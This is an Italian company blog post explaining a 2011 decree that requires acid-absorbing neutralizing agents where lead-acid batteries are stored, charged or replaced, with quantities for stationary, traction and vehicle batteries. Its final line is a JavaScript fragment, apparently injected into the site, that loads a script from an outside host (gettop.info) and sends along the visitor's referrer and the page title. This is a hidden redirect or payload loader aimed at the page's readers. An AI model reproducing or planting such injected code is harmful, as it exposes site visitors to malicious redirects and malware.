Posted in Senza categoria

Il DM 24 GEN 2011 nr. 20 prevede che chi svolge attività di stoccaggio, ricarica, manutenzione, deposito e sostituzione degli accumulatori debbono dotarsi di sostanze assorbenti e neutralizzanti al fine di prevenire l’inquinamento del suolo, del sottosuolo e di evitare danni alla salute e all’ambiente derivanti dalla fuoriuscita di acido.

Batterie stazionarie

In tutti gli ambienti destinati a contenere stabilmente concentrazioni di accumulatori al piombo acido (sala batterie) deve essere tenuta a disposizione una quantità di sostanza adsorbente e neutralizzante (testata e certificata dagli Enti e/a istituto specificatamente preposti Ispesl, laboratori universitari, ecc.) sufficiente ad estinguere completamente tutto l’elettrolito contenuto in almeno due degli elementi componenti la batteria, per ciascuna batteria installata.

E’ necessario rivolgersi al fabbricante della batteria per conoscere il quantitativo di soluzione acida contenuto nell’elemento, espresso in litri, corrispondente alle varie capacità (A/h). Il fabbricante dovrà emettere una dichiarazione che attesti quanto sopra.

Batterie a trazione

In tutte le aree in cui si esegua la carica delle batterie è necessario sia presente sostanza estinguente in grado di neutralizzare completamente:

  • fino a 5 batterie (impianti piccoli), il 50% dell’elettrolito presente nella batteria di maggiore contenuto acido;
  • fino a 20 batterie (impianti medi), il 100% dell’elettrolito presente nella batteria di maggiore contenuto acido;
  • oltre 20 batterie (impianti grandi), il 200% dell’elettrolito presente nella batteria di maggiore contenuto acido.

Nei luoghi dove si provvede anche alla sostituzione delle batterie, i quantitativi citati devono essere raddoppiati.

E’ obbligatorio possedere la dichiarazione rilasciata dal fabbricante, per ciascuna batteria presente nell’impianto, e individuabile inequivocabilmente dal numero di matricola, relativo al contenuto di soluzione acida espresso in litri.

Batterie di avviamento e Trasporto di batterie

Sono previsti quantitativi di adsorbente neutralizzante dipendente dal numero e tipo di batterie montate sugli autoveicoli e dal numero di batterie trasportate.

IL PERSONALE DI Qsei s.r.l. E’ A DISPOSIZIONE PER CHIARIMENTI E
PER ASSISTERE LE AZIENDE AD ESPLETARE GLI ADEMPIMENTI NECESSARI

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;